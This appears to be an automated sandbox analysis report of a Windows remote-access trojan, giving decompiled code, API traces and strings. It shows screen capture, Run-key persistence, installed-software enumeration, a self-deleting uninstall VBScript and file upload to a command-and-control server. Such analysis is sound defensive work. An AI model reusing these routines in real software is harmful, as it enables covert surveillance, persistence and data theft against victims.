                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 004083DA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                        • exit.MSVCRT ref: 004085A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 4026913539-546584676
                                        • Opcode ID: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                        • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                        • Opcode Fuzzy Hash: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                        • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040FA46, Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 318windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 62%
                                        			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v44;
				intOrPtr _v50;
				void* _v52;
				void* _v54;
				intOrPtr _v58;
				char _v60;
				char _v76;
				intOrPtr _v80;
				struct tagCURSORINFO _v96;
				signed int _v102;
				signed int _v104;
				long _v112;
				long _v116;
				char _v120;
				struct _ICONINFO _v140;
				int _t143;
				void* _t144;
				signed int _t153;
				long _t164;
				void* _t165;
				char* _t189;
				signed int _t193;
				void* _t214;
				signed int _t222;
				signed char _t224;
				signed int _t225;
				signed int _t242;
				struct HDC__* _t245;
				int _t249;
				struct tagBITMAPINFO* _t250;

				_t214 = 0;
				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
				_v16 = _t245;
				_v8 = CreateCompatibleDC(_t245);
				_t248 = 0x41bfc8 + _a12 * 4;
				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
				_v28 = _t143;
				if(_v12 != 0 || _t143 != 0) {
					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
					_a12 = _t144;
					if(_t144 != _t214) {
						if(SelectObject(_v8, _t144) != 0) {
							_v24 = _t214;
							asm("stosd");
							E0040FF57( *_t248,  &_v24);
							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
								if(_a8 != 0) {
									_v96.cbSize = 0x14;
									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
										DeleteObject(_v140.hbmColor);
										DeleteObject(_v140.hbmMask);
										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
										_t214 = 0;
									}
								}
								_push( &_v120);
								_t249 = 0x18;
								if(GetObjectA(_a12, _t249, ??) != 0) {
									_t153 = _v102 * _v104;
									_t242 = 1;
									if(_t153 != _t242) {
										_t222 = 4;
										if(_t153 > _t222) {
											_t222 = 8;
											if(_t153 <= _t222) {
												goto L18;
											}
											_t222 = 0x10;
											if(_t153 <= _t222) {
												goto L18;
											}
											if(_t153 > _t249) {
												_a8 = 0x20;
												L28:
												_push(0x28 + (_t242 << _a8) * 4);
												L23:
												_t250 = LocalAlloc(0x40, ??);
												_t224 = _a8;
												_t250->bmiHeader = 0x28;
												_t250->bmiHeader.biWidth = _v116;
												_t250->bmiHeader.biHeight = _v112;
												_t250->bmiHeader.biPlanes = _v104;
												_t250->bmiHeader.biBitCount = _v102;
												if(_t224 < 0x18) {
													_t193 = 1;
													_t250->bmiHeader.biClrUsed = _t193 << _t224;
												}
												_t225 = 8;
												asm("cdq");
												_t250->bmiHeader.biCompression = _t214;
												_t250->bmiHeader.biClrImportant = _t214;
												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
												_t250->bmiHeader.biSizeImage = _t164;
												_t165 = GlobalAlloc(_t214, _t164);
												_v12 = _t165;
												if(_t165 != _t214) {
													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
														_v60 = 0x4d42;
														_v54 = _t214;
														_v52 = _t214;
														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														DeleteObject(_a12);
														GlobalFree(_v12);
														DeleteDC(_v16);
														DeleteDC(_v8);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														goto L33;
													}
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													GlobalFree(_v12);
													_t189 =  &_a11;
												} else {
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													_t189 =  &_a11;
												}
												goto L31;
											}
											_a8 = _t249;
											_push(0x28);
											goto L23;
										}
										L18:
										_a8 = _t222;
										goto L28;
									}
									_a8 = _t242;
									goto L28;
								} else {
									DeleteDC(_v16);
									DeleteDC(_v8);
									DeleteObject(_a12);
									_t189 =  &_a11;
									goto L31;
								}
							}
							DeleteDC(_v16);
							DeleteDC(_v8);
							DeleteObject(_a12);
							_t189 =  &_a11;
							goto L31;
						}
						DeleteDC(_t245);
						DeleteDC(_v8);
						DeleteObject(_a12);
						_t189 =  &_a11;
						goto L31;
					}
					DeleteDC(_t245);
					DeleteDC(_v8);
					DeleteObject(_t214);
					_t189 =  &_a11;
					goto L31;
				} else {
					_t189 =  &_a11;
					L31:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
					L33:
					return _a4;
				}
			}







































                                        0x0040fa51
                                        0x0040fa62
                                        0x0040fa65
                                        0x0040fa6e
                                        0x0040fa7b
                                        0x0040fa89
                                        0x0040fa8c
                                        0x0040fa96
                                        0x0040fa99
                                        0x0040faac
                                        0x0040fab4
                                        0x0040fab7
                                        0x0040fae2
                                        0x0040fb08
                                        0x0040fb0b
                                        0x0040fb12
                                        0x0040fb40
                                        0x0040fb6d
                                        0x0040fb72
                                        0x0040fb82
                                        0x0040fbb0
                                        0x0040fbb5
                                        0x0040fbbf
                                        0x0040fbc5
                                        0x0040fbc5
                                        0x0040fb82
                                        0x0040fbca
                                        0x0040fbcd
                                        0x0040fbda
                                        0x0040fbfe
                                        0x0040fc02
                                        0x0040fc06
                                        0x0040fc12
                                        0x0040fc16
                                        0x0040fc22
                                        0x0040fc26
                                        0x00000000
                                        0x00000000
                                        0x0040fc2a
                                        0x0040fc2e
                                        0x00000000
                                        0x00000000
                                        0x0040fc33
                                        0x0040fcc4
                                        0x0040fccb
                                        0x0040fcd7
                                        0x0040fc3e
                                        0x0040fc46
                                        0x0040fc48
                                        0x0040fc4f
                                        0x0040fc58
                                        0x0040fc5e
                                        0x0040fc65
                                        0x0040fc6d
                                        0x0040fc71
                                        0x0040fc75
                                        0x0040fc78
                                        0x0040fc78
                                        0x0040fc83
                                        0x0040fc84
                                        0x0040fc8b
                                        0x0040fc8e
                                        0x0040fc94
                                        0x0040fc9a
                                        0x0040fc9d
                                        0x0040fca5
                                        0x0040fca8
                                        0x0040fcf4
                                        0x0040fd2b
                                        0x0040fd3c
                                        0x0040fd40
                                        0x0040fd48
                                        0x0040fd57
                                        0x0040fd5e
                                        0x0040fd6b
                                        0x0040fd7a
                                        0x0040fd87
                                        0x0040fd93
                                        0x0040fda0
                                        0x0040fdaf
                                        0x0040fdbc
                                        0x0040fdc5
                                        0x0040fdca
                                        0x0040fdd9
                                        0x0040fdde
                                        0x0040fde7
                                        0x0040fdf0
                                        0x0040fdf9
                                        0x00000000
                                        0x0040fdf9
                                        0x0040fcff
                                        0x0040fd04
                                        0x0040fd09
                                        0x0040fd0e
                                        0x0040fd14
                                        0x0040fcaa
                                        0x0040fcb3
                                        0x0040fcb8
                                        0x0040fcbd
                                        0x0040fcbf
                                        0x0040fcbf
                                        0x00000000
                                        0x0040fca8
                                        0x0040fc39
                                        0x0040fc3c
                                        0x00000000
                                        0x0040fc3c
                                        0x0040fc18
                                        0x0040fc18
                                        0x00000000
                                        0x0040fc18
                                        0x0040fc08
                                        0x00000000
                                        0x0040fbdc
                                        0x0040fbe5
                                        0x0040fbea
                                        0x0040fbef
                                        0x0040fbf1
                                        0x00000000
                                        0x0040fbf1
                                        0x0040fbda
                                        0x0040fb4b
                                        0x0040fb50
                                        0x0040fb55
                                        0x0040fb5b
                                        0x00000000
                                        0x0040fb5b
                                        0x0040faeb
                                        0x0040faf0
                                        0x0040faf5
                                        0x0040fafb
                                        0x00000000
                                        0x0040fafb
                                        0x0040fac0
                                        0x0040fac5
                                        0x0040fac8
                                        0x0040face
                                        0x00000000
                                        0x0040fa9f
                                        0x0040fa9f
                                        0x0040fd17
                                        0x0040fd20
                                        0x0040fdff
                                        0x0040fe06
                                        0x0040fe06

                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                        • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                          • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                        • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                        • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                        • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                        • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                        • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                        • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                        • GlobalFree.KERNEL32 ref: 0040FDCA
                                        • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                        • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                        • String ID: $BM$DISPLAY
                                        • API String ID: 585525397-871886180
                                        • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                        • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403816, Relevance: 91.3, APIs: 50, Strings: 2, Instructions: 302fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                        • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                        • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                        • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                        • String ID: Uploading file to C&C: $[INFO]
                                        • API String ID: 368904453-3151135581
                                        • Opcode ID: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                        • Opcode Fuzzy Hash: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004130BF, Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                        • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1820998543-3714951968
                                        • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                        • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A906, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 271sleepsynchronizationstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • exit.MSVCRT ref: 0040A97F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                        • exit.MSVCRT ref: 0040A9A9
                                        • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                        • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
